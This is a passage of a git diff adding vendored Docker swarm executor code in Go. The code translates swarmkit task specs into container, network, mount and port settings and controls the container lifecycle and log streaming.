+	var c containerConfig
+	return &c, c.setTask(t)
+}
+
+func (c *containerConfig) setTask(t *api.Task) error {
+	if t.Spec.GetContainer() == nil && t.Spec.GetAttachment() == nil {
+		return exec.ErrRuntimeUnsupported
+	}
+
+	container := t.Spec.GetContainer()
+	if container != nil {
+		if container.Image == "" {
+			return ErrImageRequired
+		}
+
+		if err := validateMounts(container.Mounts); err != nil {
+			return err
+		}
+	}
+
+	// index the networks by name
+	c.networksAttachments = make(map[string]*api.NetworkAttachment, len(t.Networks))
+	for _, attachment := range t.Networks {
+		c.networksAttachments[attachment.Network.Spec.Annotations.Name] = attachment
+	}
+
+	c.task = t
+
+	if t.Spec.GetContainer() != nil {
+		preparedSpec, err := template.ExpandContainerSpec(t)
+		if err != nil {
+			return err
+		}
+		c.task.Spec.Runtime = &api.TaskSpec_Container{
+			Container: preparedSpec,
+		}
+	}
+
+	return nil
+}
+
+func (c *containerConfig) id() string {
+	attachment := c.task.Spec.GetAttachment()
+	if attachment == nil {
+		return ""
+	}
+
+	return attachment.ContainerID
+}
+
+func (c *containerConfig) taskID() string {
+	return c.task.ID
+}
+
+func (c *containerConfig) endpoint() *api.Endpoint {
+	return c.task.Endpoint
+}
+
+func (c *containerConfig) spec() *api.ContainerSpec {
+	return c.task.Spec.GetContainer()
+}
+
+func (c *containerConfig) nameOrID() string {
+	if c.task.Spec.GetContainer() != nil {
+		return c.name()
+	}
+
+	return c.id()
+}
+
+func (c *containerConfig) name() string {
+	if c.task.Annotations.Name != "" {
+		// if set, use the container Annotations.Name field, set in the orchestrator.
+		return c.task.Annotations.Name
+	}
+
+	slot := fmt.Sprint(c.task.Slot)
+	if slot == "" || c.task.Slot == 0 {
+		slot = c.task.NodeID
+	}
+
+	// fallback to service.slot.id.
+	return fmt.Sprintf("%s.%s.%s", c.task.ServiceAnnotations.Name, slot, c.task.ID)
+}
+
+func (c *containerConfig) image() string {
+	raw := c.spec().Image
+	ref, err := reference.ParseNamed(raw)
+	if err != nil {
+		return raw
+	}
+	return reference.WithDefaultTag(ref).String()
+}
+
+func (c *containerConfig) portBindings() nat.PortMap {
+	portBindings := nat.PortMap{}
+	if c.task.Endpoint == nil {
+		return portBindings
+	}
+
+	for _, portConfig := range c.task.Endpoint.Ports {
+		if portConfig.PublishMode != api.PublishModeHost {
+			continue
+		}
+
+		port := nat.Port(fmt.Sprintf("%d/%s", portConfig.TargetPort, strings.ToLower(portConfig.Protocol.String())))
+		binding := []nat.PortBinding{
+			{},
+		}
+
+		if portConfig.PublishedPort != 0 {
+			binding[0].HostPort = strconv.Itoa(int(portConfig.PublishedPort))
+		}
+		portBindings[port] = binding
+	}
+
+	return portBindings
+}
+
+func (c *containerConfig) exposedPorts() map[nat.Port]struct{} {
+	exposedPorts := make(map[nat.Port]struct{})
+	if c.task.Endpoint == nil {
+		return exposedPorts
+	}
+
+	for _, portConfig := range c.task.Endpoint.Ports {
+		if portConfig.PublishMode != api.PublishModeHost {
+			continue
+		}
+
+		port := nat.Port(fmt.Sprintf("%d/%s", portConfig.TargetPort, strings.ToLower(portConfig.Protocol.String())))
+		exposedPorts[port] = struct{}{}
+	}
+
+	return exposedPorts
+}
+
+func (c *containerConfig) config() *enginecontainer.Config {
+	config := &enginecontainer.Config{
+		Labels:       c.labels(),
+		Tty:          c.spec().TTY,
+		OpenStdin:    c.spec().OpenStdin,
+		User:         c.spec().User,
+		Env:          c.spec().Env,
+		Hostname:     c.spec().Hostname,
+		WorkingDir:   c.spec().Dir,
+		Image:        c.image(),
+		ExposedPorts: c.exposedPorts(),
+		Healthcheck:  c.healthcheck(),
+	}
+
+	if len(c.spec().Command) > 0 {
+		// If Command is provided, we replace the whole invocation with Command
+		// by replacing Entrypoint and specifying Cmd. Args is ignored in this
+		// case.
+		config.Entrypoint = append(config.Entrypoint, c.spec().Command...)
+		config.Cmd = append(config.Cmd, c.spec().Args...)
+	} else if len(c.spec().Args) > 0 {
+		// In this case, we assume the image has an Entrypoint and Args
+		// specifies the arguments for that entrypoint.
+		config.Cmd = c.spec().Args
+	}
+
+	return config
+}
+
+func (c *containerConfig) labels() map[string]string {
+	var (
+		system = map[string]string{
+			"task":         "", // mark as cluster task
+			"task.id":      c.task.ID,
+			"task.name":    c.name(),
+			"node.id":      c.task.NodeID,
+			"service.id":   c.task.ServiceID,
+			"service.name": c.task.ServiceAnnotations.Name,
+		}
+		labels = make(map[string]string)
+	)
+
+	// base labels are those defined in the spec.
+	for k, v := range c.spec().Labels {
+		labels[k] = v
+	}
+
+	// we then apply the overrides from the task, which may be set via the
+	// orchestrator.
+	for k, v := range c.task.Annotations.Labels {
+		labels[k] = v
+	}
+
+	// finally, we apply the system labels, which override all labels.
+	for k, v := range system {
+		labels[strings.Join([]string{systemLabelPrefix, k}, ".")] = v
+	}
+
+	return labels
+}
+
+func (c *containerConfig) mounts() []enginemount.Mount {
+	var r []enginemount.Mount
+	for _, mount := range c.spec().Mounts {
+		r = append(r, convertMount(mount))
+	}
+	return r
+}
+
+func convertMount(m api.Mount) enginemount.Mount {
+	mount := enginemount.Mount{
+		Source:   m.Source,
+		Target:   m.Target,
+		ReadOnly: m.ReadOnly,
+	}
+
+	switch m.Type {
+	case api.MountTypeBind:
+		mount.Type = enginemount.TypeBind
+	case api.MountTypeVolume:
+		mount.Type = enginemount.TypeVolume
+	case api.MountTypeTmpfs:
+		mount.Type = enginemount.TypeTmpfs
+	}
+
+	if m.BindOptions != nil {
+		mount.BindOptions = &enginemount.BindOptions{}
+		switch m.BindOptions.Propagation {
+		case api.MountPropagationRPrivate:
+			mount.BindOptions.Propagation = enginemount.PropagationRPrivate
+		case api.MountPropagationPrivate:
+			mount.BindOptions.Propagation = enginemount.PropagationPrivate
+		case api.MountPropagationRSlave:
+			mount.BindOptions.Propagation = enginemount.PropagationRSlave
+		case api.MountPropagationSlave:
+			mount.BindOptions.Propagation = enginemount.PropagationSlave
+		case api.MountPropagationRShared:
+			mount.BindOptions.Propagation = enginemount.PropagationRShared
+		case api.MountPropagationShared:
+			mount.BindOptions.Propagation = enginemount.PropagationShared
+		}
+	}
+
+	if m.VolumeOptions != nil {
+		mount.VolumeOptions = &enginemount.VolumeOptions{
+			NoCopy: m.VolumeOptions.NoCopy,
+		}
+		if m.VolumeOptions.Labels != nil {
+			mount.VolumeOptions.Labels = make(map[string]string, len(m.VolumeOptions.Labels))
+			for k, v := range m.VolumeOptions.Labels {
+				mount.VolumeOptions.Labels[k] = v
+			}
+		}
+		if m.VolumeOptions.DriverConfig != nil {
+			mount.VolumeOptions.DriverConfig = &enginemount.Driver{
+				Name: m.VolumeOptions.DriverConfig.Name,
+			}
+			if m.VolumeOptions.DriverConfig.Options != nil {
+				mount.VolumeOptions.DriverConfig.Options = make(map[string]string, len(m.VolumeOptions.DriverConfig.Options))
+				for k, v := range m.VolumeOptions.DriverConfig.Options {
+					mount.VolumeOptions.DriverConfig.Options[k] = v
+				}
+			}
+		}
+	}
+
+	if m.TmpfsOptions != nil {
+		mount.TmpfsOptions = &enginemount.TmpfsOptions{
+			SizeBytes: m.TmpfsOptions.SizeBytes,
+			Mode:      m.TmpfsOptions.Mode,
+		}
+	}
+
+	return mount
+}
+
+func (c *containerConfig) healthcheck() *enginecontainer.HealthConfig {
+	hcSpec := c.spec().Healthcheck
+	if hcSpec == nil {
+		return nil
+	}
+	interval, _ := ptypes.Duration(hcSpec.Interval)
+	timeout, _ := ptypes.Duration(hcSpec.Timeout)
+	return &enginecontainer.HealthConfig{
+		Test:     hcSpec.Test,
+		Interval: interval,
+		Timeout:  timeout,
+		Retries:  int(hcSpec.Retries),
+	}
+}
+
+func (c *containerConfig) hostConfig() *enginecontainer.HostConfig {
+	hc := &enginecontainer.HostConfig{
+		Resources:    c.resources(),
+		GroupAdd:     c.spec().Groups,
+		PortBindings: c.portBindings(),
+		Mounts:       c.mounts(),
+	}
+
+	if c.spec().DNSConfig != nil {
+		hc.DNS = c.spec().DNSConfig.Nameservers
+		hc.DNSSearch = c.spec().DNSConfig.Search
+		hc.DNSOptions = c.spec().DNSConfig.Options
+	}
+
+	// The format of extra hosts on swarmkit is specified in:
+	// http://man7.org/linux/man-pages/man5/hosts.5.html
+	//    IP_address canonical_hostname [aliases...]
+	// However, the format of ExtraHosts in HostConfig is
+	//    <host>:<ip>
+	// We need to do the conversion here
+	// (Alias is ignored for now)
+	for _, entry := range c.spec().Hosts {
+		parts := strings.Fields(entry)
+		if len(parts) > 1 {
+			hc.ExtraHosts = append(hc.ExtraHosts, fmt.Sprintf("%s:%s", parts[1], parts[0]))
+		}
+	}
+
+	if c.task.LogDriver != nil {
+		hc.LogConfig = enginecontainer.LogConfig{
+			Type:   c.task.LogDriver.Name,
+			Config: c.task.LogDriver.Options,
+		}
+	}
+
+	return hc
+}
+
+// This handles the case of volumes that are defined inside a service Mount
+func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumesCreateBody {
+	var (
+		driverName string
+		driverOpts map[string]string
+		labels     map[string]string
+	)
+
+	if mount.VolumeOptions != nil && mount.VolumeOptions.DriverConfig != nil {
+		driverName = mount.VolumeOptions.DriverConfig.Name
+		driverOpts = mount.VolumeOptions.DriverConfig.Options
+		labels = mount.VolumeOptions.Labels
+	}
+
+	if mount.VolumeOptions != nil {
+		return &volumetypes.VolumesCreateBody{
+			Name:       mount.Source,
+			Driver:     driverName,
+			DriverOpts: driverOpts,
+			Labels:     labels,
+		}
+	}
+	return nil
+}
+
+func (c *containerConfig) resources() enginecontainer.Resources {
+	resources := enginecontainer.Resources{}
+
+	// If no limits are specified let the engine use its defaults.
+	//
+	// TODO(aluzzardi): We might want to set some limits anyway otherwise
+	// "unlimited" tasks will step over the reservation of other tasks.
+	r := c.task.Spec.Resources
+	if r == nil || r.Limits == nil {
+		return resources
+	}
+
+	if r.Limits.MemoryBytes > 0 {
+		resources.Memory = r.Limits.MemoryBytes
+	}
+
+	if r.Limits.NanoCPUs > 0 {
+		// CPU Period must be set in microseconds.
+		resources.CPUPeriod = int64(cpuQuotaPeriod / time.Microsecond)
+		resources.CPUQuota = r.Limits.NanoCPUs * resources.CPUPeriod / 1e9
+	}
+
+	return resources
+}
+
+// Docker daemon supports just 1 network during container create.
+func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig {
+	var networks []*api.NetworkAttachment
+	if c.task.Spec.GetContainer() != nil || c.task.Spec.GetAttachment() != nil {
+		networks = c.task.Networks
+	}
+
+	epConfig := make(map[string]*network.EndpointSettings)
+	if len(networks) > 0 {
+		epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0])
+	}
+
+	return &network.NetworkingConfig{EndpointsConfig: epConfig}
+}
+
+// TODO: Merge this function with createNetworkingConfig after daemon supports multiple networks in container create
+func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig {
+	var networks []*api.NetworkAttachment
+	if c.task.Spec.GetContainer() != nil {
+		networks = c.task.Networks
+	}
+
+	// First network is used during container create. Other networks are used in "docker network connect"
+	if len(networks) < 2 {
+		return nil
+	}
+
+	epConfig := make(map[string]*network.EndpointSettings)
+	for _, na := range networks[1:] {
+		epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na)
+	}
+	return &network.NetworkingConfig{EndpointsConfig: epConfig}
+}
+
+func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings {
+	var ipv4, ipv6 string
+	for _, addr := range na.Addresses {
+		ip, _, err := net.ParseCIDR(addr)
+		if err != nil {
+			continue
+		}
+
+		if ip.To4() != nil {
+			ipv4 = ip.String()
+			continue
+		}
+
+		if ip.To16() != nil {
+			ipv6 = ip.String()
+		}
+	}
+
+	return &network.EndpointSettings{
+		NetworkID: na.Network.ID,
+		IPAMConfig: &network.EndpointIPAMConfig{
+			IPv4Address: ipv4,
+			IPv6Address: ipv6,
+		},
+	}
+}
+
+func (c *containerConfig) virtualIP(networkID string) string {
+	if c.task.Endpoint == nil {
+		return ""
+	}
+
+	for _, eVip := range c.task.Endpoint.VirtualIPs {
+		// We only support IPv4 VIPs for now.
+		if eVip.NetworkID == networkID {
+			vip, _, err := net.ParseCIDR(eVip.Addr)
+			if err != nil {
+				return ""
+			}
+
+			return vip.String()
+		}
+	}
+
+	return ""
+}
+
+func (c *containerConfig) serviceConfig() *clustertypes.ServiceConfig {
+	if len(c.task.Networks) == 0 {
+		return nil
+	}
+
+	logrus.Debugf("Creating service config in agent for t = %+v", c.task)
+	svcCfg := &clustertypes.ServiceConfig{
+		Name:             c.task.ServiceAnnotations.Name,
+		Aliases:          make(map[string][]string),
+		ID:               c.task.ServiceID,
+		VirtualAddresses: make(map[string]*clustertypes.VirtualAddress),
+	}
+
+	for _, na := range c.task.Networks {
+		svcCfg.VirtualAddresses[na.Network.ID] = &clustertypes.VirtualAddress{
+			// We support only IPv4 virtual IP for now.
+			IPv4: c.virtualIP(na.Network.ID),
+		}
+		if len(na.Aliases) > 0 {
+			svcCfg.Aliases[na.Network.ID] = na.Aliases
+		}
+	}
+
+	if c.task.Endpoint != nil {
+		for _, ePort := range c.task.Endpoint.Ports {
+			if ePort.PublishMode != api.PublishModeIngress {
+				continue
+			}
+
+			svcCfg.ExposedPorts = append(svcCfg.ExposedPorts, &clustertypes.PortConfig{
+				Name:          ePort.Name,
+				Protocol:      int32(ePort.Protocol),
+				TargetPort:    ePort.TargetPort,
+				PublishedPort: ePort.PublishedPort,
+			})
+		}
+	}
+
+	return svcCfg
+}
+
+// networks returns a list of network names attached to the container. The
+// returned name can be used to lookup the corresponding network create
+// options.
+func (c *containerConfig) networks() []string {
+	var networks []string
+
+	for name := range c.networksAttachments {
+		networks = append(networks, name)
+	}
+
+	return networks
+}
+
+func (c *containerConfig) networkCreateRequest(name string) (clustertypes.NetworkCreateRequest, error) {
+	na, ok := c.networksAttachments[name]
+	if !ok {
+		return clustertypes.NetworkCreateRequest{}, errors.New("container: unknown network referenced")
+	}
+
+	options := types.NetworkCreate{
+		// ID:     na.Network.ID,
+		Driver: na.Network.DriverState.Name,
+		IPAM: &network.IPAM{
+			Driver:  na.Network.IPAM.Driver.Name,
+			Options: na.Network.IPAM.Driver.Options,
+		},
+		Options:        na.Network.DriverState.Options,
+		Labels:         na.Network.Spec.Annotations.Labels,
+		Internal:       na.Network.Spec.Internal,
+		Attachable:     na.Network.Spec.Attachable,
+		EnableIPv6:     na.Network.Spec.Ipv6Enabled,
+		CheckDuplicate: true,
+	}
+
+	for _, ic := range na.Network.IPAM.Configs {
+		c := network.IPAMConfig{
+			Subnet:  ic.Subnet,
+			IPRange: ic.Range,
+			Gateway: ic.Gateway,
+		}
+		options.IPAM.Config = append(options.IPAM.Config, c)
+	}
+
+	return clustertypes.NetworkCreateRequest{na.Network.ID, types.NetworkCreateRequest{Name: name, NetworkCreate: options}}, nil
+}
+
+func (c containerConfig) eventFilter() filters.Args {
+	filter := filters.NewArgs()
+	filter.Add("type", events.ContainerEventType)
+	filter.Add("name", c.name())
+	filter.Add("label", fmt.Sprintf("%v.task.id=%v", systemLabelPrefix, c.task.ID))
+	return filter
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go
new file mode 100644
index 0000000000..75f286a217
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go
@@ -0,0 +1,672 @@
+package container
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/binary"
+	"fmt"
+	"io"
+	"os"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	executorpkg "github.com/docker/docker/daemon/cluster/executor"
+	"github.com/docker/go-connections/nat"
+	"github.com/docker/libnetwork"
+	"github.com/docker/swarmkit/agent/exec"
+	"github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/log"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+	"golang.org/x/time/rate"
+)
+
+// controller implements agent.Controller against docker's API.
+//
+// Most operations against docker's API are done through the container name,
+// which is unique to the task.
+type controller struct {
+	task    *api.Task
+	adapter *containerAdapter
+	closed  chan struct{}
+	err     error
+
+	pulled     chan struct{} // closed after pull
+	cancelPull func()        // cancels pull context if not nil
+	pullErr    error         // pull error, only read after pulled closed
+}
+
+var _ exec.Controller = &controller{}
+
+// NewController returns a docker exec runner for the provided task.
+func newController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*controller, error) {
+	adapter, err := newContainerAdapter(b, task, secrets)
+	if err != nil {
+		return nil, err
+	}
+
+	return &controller{
+		task:    task,
+		adapter: adapter,
+		closed:  make(chan struct{}),
+	}, nil
+}
+
+func (r *controller) Task() (*api.Task, error) {
+	return r.task, nil
+}
+
+// ContainerStatus returns the container-specific status for the task.
+func (r *controller) ContainerStatus(ctx context.Context) (*api.ContainerStatus, error) {
+	ctnr, err := r.adapter.inspect(ctx)
+	if err != nil {
+		if isUnknownContainer(err) {
+			return nil, nil
+		}
+		return nil, err
+	}
+	return parseContainerStatus(ctnr)
+}
+
+func (r *controller) PortStatus(ctx context.Context) (*api.PortStatus, error) {
+	ctnr, err := r.adapter.inspect(ctx)
+	if err != nil {
+		if isUnknownContainer(err) {
+			return nil, nil
+		}
+
+		return nil, err
+	}
+
+	return parsePortStatus(ctnr)
+}
+
+// Update tasks a recent task update and applies it to the container.
+func (r *controller) Update(ctx context.Context, t *api.Task) error {
+	// TODO(stevvooe): While assignment of tasks is idempotent, we do allow
+	// updates of metadata, such as labelling, as well as any other properties
+	// that make sense.
+	return nil
+}
+
+// Prepare creates a container and ensures the image is pulled.
+//
+// If the container has already be created, exec.ErrTaskPrepared is returned.
+func (r *controller) Prepare(ctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	// Make sure all the networks that the task needs are created.
+	if err := r.adapter.createNetworks(ctx); err != nil {
+		return err
+	}
+
+	// Make sure all the volumes that the task needs are created.
+	if err := r.adapter.createVolumes(ctx); err != nil {
+		return err
+	}
+
+	if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" {
+		if r.pulled == nil {
+			// Fork the pull to a different context to allow pull to continue
+			// on re-entrant calls to Prepare. This ensures that Prepare can be
+			// idempotent and not incur the extra cost of pulling when
+			// cancelled on updates.
+			var pctx context.Context
+
+			r.pulled = make(chan struct{})
+			pctx, r.cancelPull = context.WithCancel(context.Background()) // TODO(stevvooe): Bind a context to the entire controller.
+
+			go func() {
+				defer close(r.pulled)
+				r.pullErr = r.adapter.pullImage(pctx) // protected by closing r.pulled
+			}()
+		}
+
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		case <-r.pulled:
+			if r.pullErr != nil {
+				// NOTE(stevvooe): We always try to pull the image to make sure we have
+				// the most up to date version. This will return an error, but we only
+				// log it. If the image truly doesn't exist, the create below will
+				// error out.
+				//
+				// This gives us some nice behavior where we use up to date versions of
+				// mutable tags, but will still run if the old image is available but a
+				// registry is down.
+				//
+				// If you don't want this behavior, lock down your image to an
+				// immutable tag or digest.
+				log.G(ctx).WithError(r.pullErr).Error("pulling image failed")
+			}
+		}
+	}
+
+	if err := r.adapter.create(ctx); err != nil {
+		if isContainerCreateNameConflict(err) {
+			if _, err := r.adapter.inspect(ctx); err != nil {
+				return err
+			}
+
+			// container is already created. success!
+			return exec.ErrTaskPrepared
+		}
+
+		return err
+	}
+
+	return nil
+}
+
+// Start the container. An error will be returned if the container is already started.
+func (r *controller) Start(ctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	ctnr, err := r.adapter.inspect(ctx)
+	if err != nil {
+		return err
+	}
+
+	// Detect whether the container has *ever* been started. If so, we don't
+	// issue the start.
+	//
+	// TODO(stevvooe): This is very racy. While reading inspect, another could
+	// start the process and we could end up starting it twice.
+	if ctnr.State.Status != "created" {
+		return exec.ErrTaskStarted
+	}
+
+	for {
+		if err := r.adapter.start(ctx); err != nil {
+			if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok {
+				// Retry network creation again if we
+				// failed because some of the networks
+				// were not found.
+				if err := r.adapter.createNetworks(ctx); err != nil {
+					return err
+				}
+
+				continue
+			}
+
+			return errors.Wrap(err, "starting container failed")
+		}
+
+		break
+	}
+
+	// no health check
+	if ctnr.Config == nil || ctnr.Config.Healthcheck == nil {
+		if err := r.adapter.activateServiceBinding(); err != nil {
+			log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s which has no healthcheck config", r.adapter.container.name())
+			return err
+		}
+		return nil
+	}
+
+	healthCmd := ctnr.Config.Healthcheck.Test
+
+	if len(healthCmd) == 0 || healthCmd[0] == "NONE" {
+		return nil
+	}
+
+	// wait for container to be healthy
+	eventq := r.adapter.events(ctx)
+
+	var healthErr error
+	for {
+		select {
+		case event := <-eventq:
+			if !r.matchevent(event) {
+				continue
+			}
+
+			switch event.Action {
+			case "die": // exit on terminal events
+				ctnr, err := r.adapter.inspect(ctx)
+				if err != nil {
+					return errors.Wrap(err, "die event received")
+				} else if ctnr.State.ExitCode != 0 {
+					return &exitError{code: ctnr.State.ExitCode, cause: healthErr}
+				}
+
+				return nil
+			case "destroy":
+				// If we get here, something has gone wrong but we want to exit
+				// and report anyways.
+				return ErrContainerDestroyed
+			case "health_status: unhealthy":
+				// in this case, we stop the container and report unhealthy status
+				if err := r.Shutdown(ctx); err != nil {
+					return errors.Wrap(err, "unhealthy container shutdown failed")
+				}
+				// set health check error, and wait for container to fully exit ("die" event)
+				healthErr = ErrContainerUnhealthy
+			case "health_status: healthy":
+				if err := r.adapter.activateServiceBinding(); err != nil {
+					log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s after healthy event", r.adapter.container.name())
+					return err
+				}
+				return nil
+			}
+		case <-ctx.Done():
+			return ctx.Err()
+		case <-r.closed:
+			return r.err
+		}
+	}
+}
+
+// Wait on the container to exit.
+func (r *controller) Wait(pctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	ctx, cancel := context.WithCancel(pctx)
+	defer cancel()
+
+	healthErr := make(chan error, 1)
+	go func() {
+		ectx, cancel := context.WithCancel(ctx) // cancel event context on first event
+		defer cancel()
+		if err := r.checkHealth(ectx); err == ErrContainerUnhealthy {
+			healthErr <- ErrContainerUnhealthy
+			if err := r.Shutdown(ectx); err != nil {
+				log.G(ectx).WithError(err).Debug("shutdown failed on unhealthy")
+			}
+		}
+	}()
+
+	err := r.adapter.wait(ctx)
+	if ctx.Err() != nil {
+		return ctx.Err()
+	}
+
+	if err != nil {
+		ee := &exitError{}
+		if ec, ok := err.(exec.ExitCoder); ok {
+			ee.code = ec.ExitCode()
+		}
+		select {
+		case e := <-healthErr:
+			ee.cause = e
+		default:
+			if err.Error() != "" {
+				ee.cause = err
+			}
+		}
+		return ee
+	}
+
+	return nil
+}
+
+// Shutdown the container cleanly.
+func (r *controller) Shutdown(ctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	if r.cancelPull != nil {
+		r.cancelPull()
+	}
+
+	// remove container from service binding
+	if err := r.adapter.deactivateServiceBinding(); err != nil {
+		log.G(ctx).WithError(err).Errorf("failed to deactivate service binding for container %s", r.adapter.container.name())
+		return err
+	}
+
+	if err := r.adapter.shutdown(ctx); err != nil {
+		if isUnknownContainer(err) || isStoppedContainer(err) {
+			return nil
+		}
+
+		return err
+	}
+
+	return nil
+}
+
+// Terminate the container, with force.
+func (r *controller) Terminate(ctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	if r.cancelPull != nil {
+		r.cancelPull()
+	}
+
+	if err := r.adapter.terminate(ctx); err != nil {
+		if isUnknownContainer(err) {
+			return nil
+		}
+
+		return err
+	}
+
+	return nil
+}
+
+// Remove the container and its resources.
+func (r *controller) Remove(ctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	if r.cancelPull != nil {
+		r.cancelPull()
+	}
+
+	// It may be necessary to shut down the task before removing it.
+	if err := r.Shutdown(ctx); err != nil {
+		if isUnknownContainer(err) {
+			return nil
+		}
+		// This may fail if the task was already shut down.
+		log.G(ctx).WithError(err).Debug("shutdown failed on removal")
+	}
+
+	// Try removing networks referenced in this task in case this
+	// task is the last one referencing it
+	if err := r.adapter.removeNetworks(ctx); err != nil {
+		if isUnknownContainer(err) {
+			return nil
+		}
+		return err
+	}
+
+	if err := r.adapter.remove(ctx); err != nil {
+		if isUnknownContainer(err) {
+			return nil
+		}
+
+		return err
+	}
+	return nil
+}
+
+// waitReady waits for a container to be "ready".
+// Ready means it's past the started state.
+func (r *controller) waitReady(pctx context.Context) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	ctx, cancel := context.WithCancel(pctx)
+	defer cancel()
+
+	eventq := r.adapter.events(ctx)
+
+	ctnr, err := r.adapter.inspect(ctx)
+	if err != nil {
+		if !isUnknownContainer(err) {
+			return errors.Wrap(err, "inspect container failed")
+		}
+	} else {
+		switch ctnr.State.Status {
+		case "running", "exited", "dead":
+			return nil
+		}
+	}
+
+	for {
+		select {
+		case event := <-eventq:
+			if !r.matchevent(event) {
+				continue
+			}
+
+			switch event.Action {
+			case "start":
+				return nil
+			}
+		case <-ctx.Done():
+			return ctx.Err()
+		case <-r.closed:
+			return r.err
+		}
+	}
+}
+
+func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, options api.LogSubscriptionOptions) error {
+	if err := r.checkClosed(); err != nil {
+		return err
+	}
+
+	if err := r.waitReady(ctx); err != nil {
+		return errors.Wrap(err, "container not ready for logs")
+	}
+
+	rc, err := r.adapter.logs(ctx, options)
+	if err != nil {
+		return errors.Wrap(err, "failed getting container logs")
+	}
+	defer rc.Close()
+
+	var (
+		// use a rate limiter to keep things under control but also provides some
+		// ability coalesce messages.
+		limiter = rate.NewLimiter(rate.Every(time.Second), 10<<20) // 10 MB/s
+		msgctx  = api.LogContext{
+			NodeID:    r.task.NodeID,
+			ServiceID: r.task.ServiceID,
+			TaskID:    r.task.ID,
+		}
+	)
+
+	brd := bufio.NewReader(rc)
+	for {
+		// so, message header is 8 bytes, treat as uint64, pull stream off MSB
+		var header uint64
+		if err := binary.Read(brd, binary.BigEndian, &header); err != nil {
+			if err == io.EOF {
+				return nil
+			}
+
+			return errors.Wrap(err, "failed reading log header")
+		}
+
+		stream, size := (header>>(7<<3))&0xFF, header & ^(uint64(0xFF)<<(7<<3))
+
+		// limit here to decrease allocation back pressure.
+		if err := limiter.WaitN(ctx, int(size)); err != nil {
+			return errors.Wrap(err, "failed rate limiter")
+		}
+
+		buf := make([]byte, size)
+		_, err := io.ReadFull(brd, buf)
+		if err != nil {
+			return errors.Wrap(err, "failed reading buffer")
+		}
+
+		// Timestamp is RFC3339Nano with 1 space after. Lop, parse, publish
+		parts := bytes.SplitN(buf, []byte(" "), 2)
+		if len(parts) != 2 {
+			return fmt.Errorf("invalid timestamp in log message: %v", buf)
+		}
+
+		ts, err := time.Parse(time.RFC3339Nano, string(parts[0]))
+		if err != nil {
+			return errors.Wrap(err, "failed to parse timestamp")
+		}
+
+		tsp, err := ptypes.TimestampProto(ts)
+		if err != nil {
+			return errors.Wrap(err, "failed to convert timestamp")
+		}
+
+		if err := publisher.Publish(ctx, api.LogMessage{
+			Context:   msgctx,
+			Timestamp: tsp,
+			Stream:    api.LogStream(stream),
+
+			Data: parts[1],
+		}); err != nil {
+			return errors.Wrap(err, "failed to publish log message")
+		}
+	}
+}
+
+// Close the runner and clean up any ephemeral resources.
+func (r *controller) Close() error {
+	select {
+	case <-r.closed:
+		return r.err
+	default:
+		if r.cancelPull != nil {
+			r.cancelPull()
+		}
+
+		r.err = exec.ErrControllerClosed
+		close(r.closed)
+	}
+	return nil
+}
+
+func (r *controller) matchevent(event events.Message) bool {
+	if event.Type != events.ContainerEventType {
+		return false
+	}
+
+	// TODO(stevvooe): Filter based on ID matching, in addition to name.
+
+	// Make sure the events are for this container.
+	if event.Actor.Attributes["name"] != r.adapter.container.name() {
+		return false
+	}
+
+	return true
+}
+
+func (r *controller) checkClosed() error {
+	select {
+	case <-r.closed:
+		return r.err
+	default:
+		return nil
+	}
+}
+
+func parseContainerStatus(ctnr types.ContainerJSON) (*api.ContainerStatus, error) {
+	status := &api.ContainerStatus{
+		ContainerID: ctnr.ID,
+		PID:         int32(ctnr.State.Pid),
+		ExitCode:    int32(ctnr.State.ExitCode),
+	}
+
+	return status, nil
+}
+
+func parsePortStatus(ctnr types.ContainerJSON) (*api.PortStatus, error) {
+	status := &api.PortStatus{}
+
+	if ctnr.NetworkSettings != nil && len(ctnr.NetworkSettings.Ports) > 0 {
+		exposedPorts, err := parsePortMap(ctnr.NetworkSettings.Ports)
+		if err != nil {
+			return nil, err
+		}
+		status.Ports = exposedPorts
+	}
+
+	return status, nil
+}
+
+func parsePortMap(portMap nat.PortMap) ([]*api.PortConfig, error) {
+	exposedPorts := make([]*api.PortConfig, 0, len(portMap))
+
+	for portProtocol, mapping := range portMap {
+		parts := strings.SplitN(string(portProtocol), "/", 2)
+		if len(parts) != 2 {
+			return nil, fmt.Errorf("invalid port mapping: %s", portProtocol)
+		}
+
+		port, err := strconv.ParseUint(parts[0], 10, 16)
+		if err != nil {
+			return nil, err
+		}
+
+		protocol := api.ProtocolTCP
+		switch strings.ToLower(parts[1]) {
+		case "tcp":
+			protocol = api.ProtocolTCP
+		case "udp":
+			protocol = api.ProtocolUDP
+		default:
+			return nil, fmt.Errorf("invalid protocol: %s", parts[1])
+		}
+
+		for _, binding := range mapping {
+			hostPort, err := strconv.ParseUint(binding.HostPort, 10, 16)
+			if err != nil {
